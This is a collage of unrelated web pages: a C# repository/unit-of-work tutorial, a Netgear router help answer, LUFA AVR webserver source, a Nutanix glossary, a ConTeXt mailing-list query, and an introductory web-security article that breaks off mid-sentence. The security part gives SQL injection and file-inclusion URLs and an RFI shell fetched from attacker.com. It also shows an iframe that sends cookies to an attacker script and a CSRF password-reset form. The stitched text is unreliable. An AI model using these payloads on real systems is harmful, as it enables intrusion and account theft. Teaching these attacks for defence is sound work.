SampleDatabaseEntities(); #region IBooksRepository Members BooksRepository() { entities = new SampleDatabaseEntities(); } public List<Book> GetAllBooks() { return entities.Books.ToList(); } public Book GetBookById(int id) { return entities.Books.SingleOrDefault(book => book.ID == id); } public void AddBook(Book book) { entities.Books.AddObject(book); } public void UpdateBook(int id, Book book) { Book b = GetBookById(id); b = book; } public void DeleteBook(Book book) { entities.Books.DeleteObject(book); } public void Save() { entities.SaveChanges(); } #endregion #region IDisposable Members public void Dispose() { Dispose(true); GC.SuppressFinalize(this); } protected virtual void Dispose(bool disposing) { if (disposing == true) { entities = null; } } ~BooksRepository() { Dispose(false); } #endregion } Now let us create a simple Controller in which we will have the reference to this class being used perform the CRUD operations on Books table. public class BooksController : Controller { private IBooksRepository booksRepository = null; public BooksController() :this(new BooksRepository()) { } public BooksController(IBooksRepository bookRepo) { this.booksRepository = bookRepo; } public ActionResult Index() { List<Book> books = booksRepository.GetAllBooks(); return View(books); } } Now here in this above code when the application runs the default parameter-less constructor will run which will create a BooksRepository object and it will be used in the class. The result of which is that the application will be able to work with actual data from the database. Now from our test project we will call the parameterized constructor with an object of the dummy class containing dummy data. The benefit of which is that we should be able to test and verify the controller classes using the dummy data. Lets run the application to see the output   Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. Lets try to visualize this version of implementation   Having Multiple Repositories Now imagine the scenario where we have multiple tables in the database. Then we need to create multiple repositories in order to map the domain model to the data model. Now having multiple repository classes poses on problem. The problem is regarding the ObjectContext object. If we create multiple repositories, should they contain their ObjectContext separately? We know that using multiple instances of ObjectContext object simultaneously can be a problem so should we really allow each repository to contain their own instances? To solve this problem. Why to let each Repository class instance have its own instance of the ObjectContext. Why not create the instance of ObjectContext in some central location and then pass this instance to the repository classes whenever they are being instantiated. Now this new class will be called as UnitOfWork and this class will be responsible for creating the ObjectContext nstance and handing over all the repository instances to the controllers. Unit Of Work So let us create a separate Repository to which will be used via UnitOfWork class and the ObjectContext will be passed to this class from outside. public class BooksRepositoryEn { SampleDatabaseEntities entities = null; public BooksRepositoryEn(SampleDatabaseEntities entities) { this.entities = entities; } public List<Book> GetAllBooks() { return entities.Books.ToList(); } public Book GetBookById(int id) { return entities.Books.SingleOrDefault(book => book.ID == id); } public void AddBook(Book book) { entities.Books.AddObject(book); } public void UpdateBook(int id, Book book) { Book b = GetBookById(id); b = book; } public void DeleteBook(Book book) { entities.Books.DeleteObject(book); } public void Save() { entities.SaveChanges(); } } Now this Repository class is taking the ObjectContext object from outside(whenever it is being created). Also, we don't need to implement IDisposable here because this class is not creating the instance and so its not this class's responsibility to dispose it. Now if we have to create multiple repositories, we can simply have all the repositories take the ObjectContext object at the time of construction. Now let us see how the UnitOfWork class creates the repository and passes it on to the Controller. public class UnitOfWork : IDisposable { private SampleDatabaseEntities entities = null; // This will be called from controller default constructor public UnitOfWork() { entities = new SampleDatabaseEntities(); BooksRepository = new BooksRepositoryEn(entities); } // This will be created from test project and passed on to the // controllers parameterized constructors public UnitOfWork(IBooksRepository booksRepo) { BooksRepository = booksRepo; } public IBooksRepository BooksRepository { get; private set; } #region IDisposable Members public void Dispose() { Dispose(true); GC.SuppressFinalize(this); } protected virtual void Dispose(bool disposing) { if (disposing == true) { entities = null; } } ~UnitOfWork() { Dispose(false); } #endregion } Now we have a parameter-less constructor which will be called from controller default constructor i.e. whenever our page runs. We also have a parameterized constructor which will be created from test project and passed on to the controllers parameterized constructors. The dispose pattern is now implemented by the UnitOfWork class because now it is responsible for creating the ObjectContext so it should be the one disposing it. Let us look at the implementation of the Controller class now. public class BookEnController : Controller { private UnitOfWork unitOfWork = null; public BookEnController() : this(new UnitOfWork()) { } public BookEnController(UnitOfWork uow) { this.unitOfWork = uow; } public ActionResult Index() { List<Book> books = unitOfWork.BooksRepository.GetAllBooks(); return View(books); } } Now the test-ablity of this controller is still maintained by having the combination of default and parameterized constructor. Also, the data access code is now centralized in one place with the possibility of having multiple repository classes being instantiated at the same time. Let us run the application. Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. And finally let us visualize our implementation with Unit of Work in place.   Point of interest In this article we saw what is Repository and Unit of work pattern. We have also seen a rudimentary implementation for the same in an ASP.NET MVC application. The next step to the project would be to convert all the repository classes into one generic repository so that we don't need to create multiple repository classes. I hope this has been informative. History • 12 April 2013: First version. License This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Share About the Author Rahul Rajat Singh Software Developer (Senior) India India I Started my Programming career with C++. Later got a chance to develop Windows Form applications using C#. Currently using C#, ASP.NET & ASP.NET MVC to create Information Systems, e-commerce/e-governance Portals and Data driven websites. My interests involves Programming, Website development and Learning/Teaching subjects related to Computer Science/Information Systems. IMO, C# is the best programming language and I love working with C# and other Microsoft Technologies. • Microsoft Certified Technology Specialist (MCTS): Web Applications Development with Microsoft .NET Framework 4 • Microsoft Certified Technology Specialist (MCTS): Accessing Data with Microsoft .NET Framework 4 • Microsoft Certified Technology Specialist (MCTS): Windows Communication Foundation Development with Microsoft .NET Framework 4   If you like my articles, please visit my website for more: www.rahulrajatsingh.com[^] Follow on   Twitter   Google+   LinkedIn Comments and Discussions   GeneralMy vote of 5 Pinmembercoransoy2-Jun-13 4:42  General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Rant Rant    Admin Admin    Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | Advertise | Privacy | Mobile Web03 | 2.8.140916.1 | Last Updated 12 Apr 2013 Article Copyright 2013 by Rahul Rajat Singh Everything else Copyright © CodeProject, 1999-2014 Terms of Service Layout: fixed | fluid
__label__pos
0.958047
How to Troubleshoot NETGEAR Nighthawk Router? Hello guys. I have a NETGEAR nighthawk router but I'm facing problem while connecting to my home Network. CAN anybody help me to troubleshoot NETGEAR nighthawk router. If you are able to access your Nghthawk router but you fail to get an access to the internet, then in such a case you must try to acquire the IP address from your ISP. You can check whether your request has been sent successfully or not by going to the status screen of your router. If you want to know how to access my Netgear Nighthawk router, then these are some of the steps that you must bring into action. Check Wide Area Network IP address • Launch your web browser and then go to an external website. • Go to the main router page by typing www.routerlogin.net in the URL section. • Now, go to Administration and then router settings. • Now, check whether there is an IP address or not. In case you see 0.0.0.0, then that means you did not acquire IP address from your internet service provider. If you are not able to acquire IP address from your internet service provider, then you may have to start a new network so that your DSL modem can recognise it. There can be several reasons reasons responsible for why you are not able to obtain an IP address from your ISP.  It can be one of the problems mentioned below: 1. There is a chance that your service provider may require a login process. You must put up a question to your internet service provider whether they need PPPOE or some other kind of login. 2. If it needs a login that means the password or username must have been wrongly set. 3. ISP may ask for the host name of your computer. Now, go to the setup screen and assign the system host name. 4. There is a high possibility that your ISP enables MAC address to get linked to the network and that is why it is searching for the MAC address. In such a case, you can do two things: 1. Tell your internet service provider that you have purchased a new device. Then, tell them to use the MAC address of your router. 2. Now, setup your router and copy the MAC address of your system. How to Troubleshoot NETGEAR Nighthawk Router Post Your Answer Is This Service Helpfull to You? Our Services are rated 4.6 out of 5 based on 266 ratings on Google & Featured Customers How can I earn Points? Awarded a Best Answer 10 points Answer Questions 2 points Choose a Best Answer 3 points
__label__pos
0.709668
/* LUFA Library Copyright (C) Dean Camera, 2010. dean [at] fourwalledcubicle [dot] com www.fourwalledcubicle.com */ /* Copyright 2010 Dean Camera (dean [at] fourwalledcubicle [dot] com) Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that the copyright notice and this permission notice and warranty disclaimer appear in supporting documentation, and that the name of the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission. The author disclaim all warranties with regard to this software, including all implied warranties of merchantability and fitness. In no event shall the author be liable for any special, indirect or consequential damages or any damages whatsoever resulting from loss of use, data or profits, whether in an action of contract, negligence or other tortious action, arising out of or in connection with the use or performance of this software. */ /** \file * * Main source file for the Webserver project. This file contains the main tasks of * the demo and is responsible for the initial application hardware configuration. */ #include "Webserver.h" /** LUFA RNDIS Class driver interface configuration and state information. This structure is * passed to all RNDIS Class driver functions, so that multiple instances of the same class * within a device can be differentiated from one another. */ USB_ClassInfo_RNDIS_Host_t Ethernet_RNDIS_Interface = { .Config = { .DataINPipeNumber = 1, .DataINPipeDoubleBank = false, .DataOUTPipeNumber = 2, .DataOUTPipeDoubleBank = false, .NotificationPipeNumber = 3, .NotificationPipeDoubleBank = false, .HostMaxPacketSize = UIP_CONF_BUFFER_SIZE, }, }; struct timer ConnectionTimer, ARPTimer; uint16_t MillisecondTickCount; /** ISR for the management of the connection management timeout counter */ ISR(TIMER0_COMPA_vect, ISR_BLOCK) { MillisecondTickCount++; } void TCPCallback(void) { printf("Callback!\r\n"); } /** Main program entry point. This routine configures the hardware required by the application, then * enters a loop to run the application tasks in sequence. */ int main(void) { SetupHardware(); puts_P(PSTR(ESC_FG_CYAN "RNDIS Host Demo running.\r\n" ESC_FG_WHITE)); LEDs_SetAllLEDs(LEDMASK_USB_NOTREADY); for (;;) { switch (USB_HostState) { case HOST_STATE_Addressed: LEDs_SetAllLEDs(LEDMASK_USB_ENUMERATING); uint16_t ConfigDescriptorSize; uint8_t ConfigDescriptorData[512]; if (USB_Host_GetDeviceConfigDescriptor(1, &ConfigDescriptorSize, ConfigDescriptorData, sizeof(ConfigDescriptorData)) != HOST_GETCONFIG_Successful) { printf("Error Retrieving Configuration Descriptor.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } if (RNDIS_Host_ConfigurePipes(&Ethernet_RNDIS_Interface, ConfigDescriptorSize, ConfigDescriptorData) != RNDIS_ENUMERROR_NoError) { printf("Attached Device Not a Valid RNDIS Class Device.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } if (USB_Host_SetDeviceConfiguration(1) != HOST_SENDCONTROL_Successful) { printf("Error Setting Device Configuration.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } if (RNDIS_Host_InitializeDevice(&Ethernet_RNDIS_Interface) != HOST_SENDCONTROL_Successful) { printf("Error Initializing Device.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } printf("Device Max Transfer Size: %lu bytes.\r\n", Ethernet_RNDIS_Interface.State.DeviceMaxPacketSize); uint32_t PacketFilter = (REMOTE_NDIS_PACKET_DIRECTED | REMOTE_NDIS_PACKET_BROADCAST | REMOTE_NDIS_PACKET_ALL_MULTICAST); if (RNDIS_Host_SetRNDISProperty(&Ethernet_RNDIS_Interface, OID_GEN_CURRENT_PACKET_FILTER, &PacketFilter, sizeof(PacketFilter)) != HOST_SENDCONTROL_Successful) { printf("Error Setting Device Packet Filter.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } struct uip_eth_addr MACAddress; if (RNDIS_Host_QueryRNDISProperty(&Ethernet_RNDIS_Interface, OID_802_3_CURRENT_ADDRESS, &MACAddress, sizeof(MACAddress)) != HOST_SENDCONTROL_Successful) { printf("Error Getting MAC Address.\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); USB_HostState = HOST_STATE_WaitForDeviceRemoval; break; } printf("MAC Address: 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X 0x%02X\r\n", MACAddress.addr[0], MACAddress.addr[1], MACAddress.addr[2], MACAddress.addr[3], MACAddress.addr[4], MACAddress.addr[5]); uip_setethaddr(MACAddress); printf("RNDIS Device Enumerated.\r\n"); USB_HostState = HOST_STATE_Configured; break; case HOST_STATE_Configured: ProcessIncommingPacket(); ManageConnections(); break; } RNDIS_Host_USBTask(&Ethernet_RNDIS_Interface); USB_USBTask(); } } void ProcessIncommingPacket(void) { if (RNDIS_Host_IsPacketReceived(&Ethernet_RNDIS_Interface)) { LEDs_SetAllLEDs(LEDMASK_USB_BUSY); /* Read the incomming packet straight into the UIP packet buffer */ RNDIS_Host_ReadPacket(&Ethernet_RNDIS_Interface, uip_buf, &uip_len); printf("RECEIVED PACKET (%d):\r\n", uip_len); for (uint16_t i = 0; i < uip_len; i++) printf("0x%02X ", uip_buf[i]); printf("\r\n\r\n"); struct uip_eth_hdr* EthernetHeader = (struct uip_eth_hdr*)&uip_buf[0]; if (EthernetHeader->type == HTONS(UIP_ETHTYPE_IP)) { /* Filter packet by MAC destination */ uip_arp_ipin(); /* Process incomming packet */ uip_input(); /* Add destination MAC to outgoing packet */ if (uip_len > 0) uip_arp_out(); } else if (EthernetHeader->type == HTONS(UIP_ETHTYPE_ARP)) { /* Process ARP packet */ uip_arp_arpin(); } /* If a response was generated, send it */ if (uip_len > 0) RNDIS_Host_SendPacket(&Ethernet_RNDIS_Interface, uip_buf, uip_len); printf("SENT PACKET (%d):\r\n", uip_len); for (uint16_t i = 0; i < uip_len; i++) printf("0x%02X ", uip_buf[i]); printf("\r\n\r\n"); LEDs_SetAllLEDs(LEDMASK_USB_READY); } } void ManageConnections(void) { /* Manage open connections */ if (timer_expired(&ConnectionTimer)) { timer_reset(&ConnectionTimer); LEDs_SetAllLEDs(LEDMASK_USB_BUSY); for (uint8_t i = 0; i < UIP_CONNS; i++) { /* Run periodic connection management for each connection */ uip_periodic(i); /* If a response was generated, send it */ if (uip_len > 0) RNDIS_Host_SendPacket(&Ethernet_RNDIS_Interface, uip_buf, uip_len); } LEDs_SetAllLEDs(LEDMASK_USB_READY); } /* Manage ARP cache refreshing */ if (timer_expired(&ARPTimer)) { timer_reset(&ARPTimer); uip_arp_timer(); } } /** Configures the board hardware and chip peripherals for the demo's functionality. */ void SetupHardware(void) { /* Disable watchdog if enabled by bootloader/fuses */ MCUSR &= ~(1 << WDRF); wdt_disable(); /* Disable clock division */ clock_prescale_set(clock_div_1); /* Hardware Initialization */ SerialStream_Init(9600, false); LEDs_Init(); USB_Init(); /* uIP Timing Initialization */ clock_init(); timer_set(&ConnectionTimer, CLOCK_SECOND / 2); timer_set(&ARPTimer, CLOCK_SECOND * 10); /* uIP Stack Initialization */ uip_init(); uip_ipaddr_t IPAddress, Netmask, GatewayIPAddress; uip_ipaddr(&IPAddress, 192, 168, 1, 10); uip_ipaddr(&Netmask, 255, 255, 255, 0); uip_ipaddr(&GatewayIPAddress, 192, 168, 1, 1); uip_sethostaddr(&IPAddress); uip_setnetmask(&Netmask); uip_setdraddr(&GatewayIPAddress); /* HTTP Webserver Initialization */ uip_listen(HTONS(80)); } /** Event handler for the USB_DeviceAttached event. This indicates that a device has been attached to the host, and * starts the library USB task to begin the enumeration and USB management process. */ void EVENT_USB_Host_DeviceAttached(void) { puts_P(PSTR("Device Attached.\r\n")); LEDs_SetAllLEDs(LEDMASK_USB_ENUMERATING); } /** Event handler for the USB_DeviceUnattached event. This indicates that a device has been removed from the host, and * stops the library USB task management process. */ void EVENT_USB_Host_DeviceUnattached(void) { puts_P(PSTR("\r\nDevice Unattached.\r\n")); LEDs_SetAllLEDs(LEDMASK_USB_NOTREADY); } /** Event handler for the USB_DeviceEnumerationComplete event. This indicates that a device has been successfully * enumerated by the host and is now ready to be used by the application. */ void EVENT_USB_Host_DeviceEnumerationComplete(void) { LEDs_SetAllLEDs(LEDMASK_USB_READY); } /** Event handler for the USB_HostError event. This indicates that a hardware error occurred while in host mode. */ void EVENT_USB_Host_HostError(const uint8_t ErrorCode) { USB_ShutDown(); printf_P(PSTR(ESC_FG_RED "Host Mode Error\r\n" " -- Error Code %d\r\n" ESC_FG_WHITE), ErrorCode); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); for(;;); } /** Event handler for the USB_DeviceEnumerationFailed event. This indicates that a problem occurred while * enumerating an attached USB device. */ void EVENT_USB_Host_DeviceEnumerationFailed(const uint8_t ErrorCode, const uint8_t SubErrorCode) { printf_P(PSTR(ESC_FG_RED "Dev Enum Error\r\n" " -- Error Code %d\r\n" " -- Sub Error Code %d\r\n" " -- In State %d\r\n" ESC_FG_WHITE), ErrorCode, SubErrorCode, USB_HostState); LEDs_SetAllLEDs(LEDMASK_USB_ERROR); }
__label__pos
0.977255
Nutanix Components – Part2 Spread the love In this article, I will explain the Nutanix hardware components, and the differences between logical and physical datastores, also a group of terminologies that using in Nutanix technology. Nutanix Hardware Components & Terminology 1. Nutanix Node The foundational unit for the cluster is a Nutanix node. Each node in the cluster is a standard x86 server that runs an industry standard hypervisor and contains a Nutanix Controller VM, processors, memory, and local storage composed of both low latency SSDs and economical HDDs. Nodes work together across a 10GbE network to form a Nutanix cluster and a distributed platform called the Acropolis Distributed Storage Fabric, or DSF. 2. Nutanix Block A Nutanix block is a bundled hardware and software appliance that houses up to four nodes in a 2U footprint. All of the nodes in a block share power and fan resources. 3. Nutanix Cluster A Nutanix cluster is a group of Nutanix nodes and blocks that can easily scale into hundreds or thousands of nodes across many physical blocks with virtually no performance loss. A cluster must contain a minimum of three nodes to operate. 4. Storage Tiers Storage Tiers utilize MapReduce tiering technology to ensure that data is intelligently placed in the optimal storage tier (flash or HDD) to yield the fastest possible performance. 5. Storage Pool A STORAGE POOL is a group of physical storage devices, including SSD and HHD devices, for the cluster. The storage pool can span multiple Nutanix nodes and is expanded as the cluster scales. 6. Container A CONTAINER is a logical segmentation of the storage pool and contains a group of VMs or files (vDisks). Containers are usually mapped to hosts as shared storage in the form of an NFS datastore or an SMB share. 7. vDisk A vDisk is a subset of available storage within a container that provides storage to virtual machines. If the container is mounted as an NFS volume, then the creation and management of vDisks within that container is handled automatically by the cluster. 8. Datastore A DATASTORE is a logical container for files necessary for VM operations. Thanks for Reading! Leave a Reply Your email address will not be published.
__label__pos
0.573093
[NTG-context] Simple question Gerben Wierda gerben.wierda at rna.nl Tue May 10 00:15:30 CEST 2022 What is the easiest way to have a ‘database’ of translations for strings and maybe links? I now have 4 languages and 2 versions so 8 documents, but I’d like to have all translatable strings together so I can maintain these in a single file. Ideally I can do a file where the key of the translation is one language (say English) and the translations are part of that. Something I can call like this \translatephrase[English phrase][nl] \translatelocation[../LMTX-Output/without-ids/en/file.pdf][nl][simple] and where I can maintain all the translations a bit like this: \translationentry[English phrase]{ \definetranslatephrase[nl]Nederlandse frase] \definetranslatephrase[fr][Phrase français] } } \translatelocation[../LMTX-Output/without-ids/en/file.pdf][simple][nl][../LMTX-Output/without-ids/nl/file-simple.pdf]] \translatelocation[../LMTX-Output/without-ids/en/file.pdf][none][nl][../LMTX-Output/without-ids/nl/file.pdf]] Where the \translatelocation command can be used inside an \externalfigure command and \translatephrase can be used as as text. In the end I’d like to compile with context language=fr mode=simple mainfile.tex Doable? Gerben Wierda (LinkedIn <https://www.linkedin.com/in/gerbenwierda>) R&A IT Strategy <https://ea.rna.nl/> (main site) Book: Chess and the Art of Enterprise Architecture <https://ea.rna.nl/the-book/> Book: Mastering ArchiMate <https://ea.rna.nl/the-book-edition-iii/> -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mailman.ntg.nl/pipermail/ntg-context/attachments/20220510/c78fe70d/attachment.htm> More information about the ntg-context mailing list
__label__pos
0.905094
Web Application Security Basics With the development of the computers and the communication technologies, the question of the security is becoming more and more pressing. In this article we will attempt to summarize the most common vulnerabilities in Web applications and the ways to secure them. Some History With the development of the computers and the communication technologies, the question of computer security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for the companies – you cannot do business if you do not use Internet and/or web-based solutions: ERP applications, collaboration tools, you name it. This is raising many questions, such as “How secure is the information of my company?”; “How secure is the information of my customers?”; “Can someone access this information without authorization?”; “What do I need to do to protect myself from getting hacked?”, and so on. These questions are more relevant today, than they were in the past. Twenty years ago, very few people used computers, and even fewer dealt with information security. For those that did, this was either a hobby or a profession, and they had a different way of thinking – if they found a vulnerability in some software or system, they would report it to the owners, so that they can fix or mitigate it. I remember, in the 90’s, there was a guy that hacked the name server of our university network through the finger daemon, and report it it immediately without doing any harm. Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that can automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. This is making “hacking” (if we use the term loosely) very easy. Why the Web Application security matters? Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to “hacking resources”, the threat to the information security has increased enormously. With the migration to the Web applications, combined with the whole fuzz around the cloud computing, the focus of the security specialists and researchers has shifted. On one hand, it is harder to find a remote exploit for the operating systems. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need to do that is a Web browser – take the LFI, RFI, File Upload, SQLi. If the application is vulnerable to LFI, you can include the process environment file, which will be parsed by the PHP interpreter. Then, if you change the User-Agent to a PHP code, it will be executed, giving you a remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, the vulnerabilities are announced publicly, sometimes even before there is a patch for them. Yeah, but why on earth would someone attack my company? Well, the motivation of the hacker can be different – industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines/networks; real or imaginary profit; revenge, hacktivism, etc. Anyone can target any company even for no particular reason. So what could be the damage? No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, law suits. If a server is hacked and used as a hopping station to target other networks, it may be confiscated by the law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect the productivity. A compromise of a server can lead to attacks on the internal networks of the company. That is why, we need to know what are the Most Common Vulnerabilities in the Web Applications The Open Web Application Security Project (OWASP) defines ten categories, which combine “the most serious risks for a broad array of organizations.” Below, we will outline some of the most common vulnerabilities we have met in the course of our work. Probably, the most common and the easiest one to exploit is SQL Injection – Exploiting the Developer Almost every dynamic Web application uses some kind of database back-end. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the back-end database. These parameter, however, depend on the user behavior, and can, therefore, be modified by them. This is a basic functionality of the Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close a legitimate query and pass their own queries to the database and get the results one way or another. In other words, SQL Injection exploit the assumptions, made by the application developers. For example, when the developer use the following code: $sql = ' SELECT * FROM products WHERE id = ' . $_GET['id']; they want the script to  query the database for products matching a given ID that is passed as a GET parameter.  That is, if the visitors access http://target.com//vulnerable_script.php?id=1, they would see the details for the product with ID 1. The database query will look like this: SELECT * FROM products WHERE id = 1 In this particular case, the developers assumes that the ‘id’ parameter would always be an integer. However, since the value of the ‘id’ parameter is passed to the database by the user without any filtering, a malicious user can input the following URL in the browser: http://target.com//vulnerable_script.php? id=1+union+select+0,1,concat_ws(user(),0x3a,database(),0x3a,version()),3,4,5,6– In this case, the DB query will look like this: SELECT * FROM products WHERE id = 1 union all select 0,1,concat_ws(user(),0x3A,database(),0x3A,version()),3,4,5,6 Basically, this tells the database to display the information about the product with ID 1 and combine it with a set of data that contains the information about the user, the name of the database and the version of the database server. This information is selected in the third column, separated by colons (0x3A). To make this query, the attacker needs to know the number of the columns in the database. This information can be easily obtained by several requests that instruct the database to display the data, ordered by a particular column. This is a basic example for a regular Union SQL Injection. There are other flavors of SQLi – error-based, time-based blind, boolean-based blind. Error-based SQL Injection attacks rely on extracting information from the errors, returned by the database. There is a nice introductory tutorial on error-based SQLi on Youtube. Surprisingly often, developers think that when they hide the errors from the output, they have resolved the vulnerability. Of course, this is not the case – the fact that you cannot see the data, returned by the database (union-based) or the errors (error-based), does not mean that the script is not vulnerable. In these cases, an attacker can use Blind SQL Injection to exfiltrate data, i.e. brute-force the data, based on boolean or time-based conditions. In these cases, you will pass queries that will inspect the responses of the database server and reconstruct the data. Of course, the attackers and pentesters are not stuck with the browser to exploit these vulnerabilities. There are numerous tools that will automate the process. The best one is sqlmap. Bernardo and Miroslav have done amazing job developing this tool. There are several things that can be done to prevent SQL Injection. The most widely used method is filtering the user input This method is the easiest to implement, and, if not implemented properly, it can be bypassed. There are numerous techniques to bypass defenses, based on input filtering – case tampering, white space tampering, encoding the queries. A lot better defense against SQLi is to use parameterized queries or “prepared statements”. These are essentially templates for SQL queries, which contain spaces where the user input will go. When the filled-in template is passed to the database, the entire user input would be in the space allocated for it in the template. The database will execute the query from the template, instead of the query that may be supplied in the user input. Alternatively, developers can use ORM (Object Relational Mapping) This is a technique for object conversion, which converts the tables in the database to scalar variables, creating a virtual database. In practice, the ORM systems generate parameterized queries. The second most common vulnerability in Web applications is File Inclusion – Exploiting the Functionality This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs, or from a remote server, visible to this machine. The possibility to include different scripts is essential for the work of every application – this is how the application logic is abstracted or how different pages are displayed, depending on the user choice. Let’s take a fairly simple website that has four pages: Home, News, About Us, Contacts. If the visitor accesses the Home page, the URL they will use would look like that: http://target.com/vulnerable_script?page=home In other words, the script accepts one parameter (page), which value specifies the page that is requested by the visitor. Let’s assume that the script has the following code: <?php $page = $_GET['page']; if(isset($page)) { include("$page"); } else { include("vulnerable_script.php"); } ?> The code is self-explanatory – the value of the GET parameter page is assigned to a variable ‘page’. If its value is not NULL, the script includes the script with a name that is the same as the value. The problem with this code is that the page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL: http://target.com/vulnerable_script?page=../../../../etc/passwd the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI. Often, programmers think that to secure the script above, they only need to add one little modification: <?php $page = $_GET['page']; if(isset($page)) { include("$page" . “.html”); } else { include("vulnerable_script.php"); } ?> The only difference here is that a .html extension is added to the page that is included. However, by simply appending a null character (%00) to the URL, the attacker would still be able to include arbitrary files. This depends on the server configuration, the PHP version and may not work in all cases. In other cases, the developers use the file_exists() function, but this is functionality check, not a security one, because it does not limit the ability to include existing files. LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the Operating System. Let’s say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process – it contains the environmental variables for the running process. Besides the system environmental variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.) So, if the hacker changes the User-Agent header, passed to the server to a PHP script, the script will be parsed by the PHP interpreter and executed on the server. So far, we’ve looked into the ability to include files locally from the server, on which the vulnerable script is running. To include files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL – the attacker would just have to use an address, such as http://target.com/vulnerable_script?page=http://attacker.com/php_shell.txt%00 The file php_shell.txt will be included by the vulnerable script and parsed by the interpreter and executed locally on the server, effectively giving the attacker web shell access to the machine. Much like the SQL Injection vulnerabilities, the File Inclusion vulnerabilities are fairly easy to find and exploit. They are too a result of bad programming. Another such result is the Arbitrary File Upload or Exploiting the Hostpitality We have previously posted about these type of vulnerabilities, so we are going to skip this one here. The truth is that it is not just media upload forms that can be exploited. Any file upload script can be used. There may not even be an HTML form; the attackers can just make a request to the script. Even if we have a secure application, we should always be watching for Unprotected Files or Exploiting the Negligence People often make mistakes because of negligence. Developers and/or system administrators are not an exception to this rule. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with improper content type that would be downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a web application has to make a quick change on the production server. They create a backup of the script that are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it will still represent a security issue, because the backup file will most probably be downloaded by whoever accesses it. In another scenario, the Web application may use a Rich Text Editor, such as FCKEditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP be placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly. Probably the most common and overlooked vulnerability is XSS or Exploiting the User There are situations, in which the Web application allows us to get to the server through the user. The XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts, which are executed in the context of the browser of the webapp user. This is due to improper validation of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-peristent (reflected). Persistent XSS attacks store the injected code on the server and it is executed each time the page is displayed to the visitors. Here is an example scenario that uses stored XSS to get the cookie of the Web application user. • The attacker creates a script on their server that will collect the cookies. • The attacker injects the following hidden iframe in the application: <iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”attacker.com/get_cookies.php?cookie=” + document.cookie)></iframe> • An authenticated user loads the page that contains the iframe. • The cookie is sent to the script, which writes it to a file or a database. • The attacker loads the cookie in their browser and is able to authenticate as the user. Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user to follow a link. Although XSS attacks usually attempt to steal cookies, this is not always the case. They may be used to target the passwords saved in the browser, and let’s not forget BeEF. This means that setting the HttpOnly flag is not enough to protect the Web application users from XSS attacks. The best protection will be to validate and sanitizing the input and the output of the application alongside with tightened cookie security policies. A close relative of the XSS is the XSRF or Exploiting the Browser In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack is a hybrid between an XSS and a LFI attack. XSRF attacks are a way to issue commands from a user that the Web application trusts. Suppose we have a page in our Web application where the users can change their passwords. If the form is vulnerable to XSRF, the attacker can exploit this vulnerability to reset the password of the user. Here is how such an attack will take place: • The attacker creates their own form on their server: <html> <head></head> <body onLoad="javascript:document.password_form.submit()"> <form action="https://target.com/admin/admin.php?" method=post name="password_form"> <input type=hidden name=a value=change_password> <input type=password name=password1 VALUE="new_pass"> <input type=password name=password2 VALUE="new_pass"> </form> </body> </html> • The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form. • The attacker tricks the user to access the page (the user has to have an active session with the Web application). • The form submits the data to the server, effectively changing the password. The only difficult thing in the attack is to 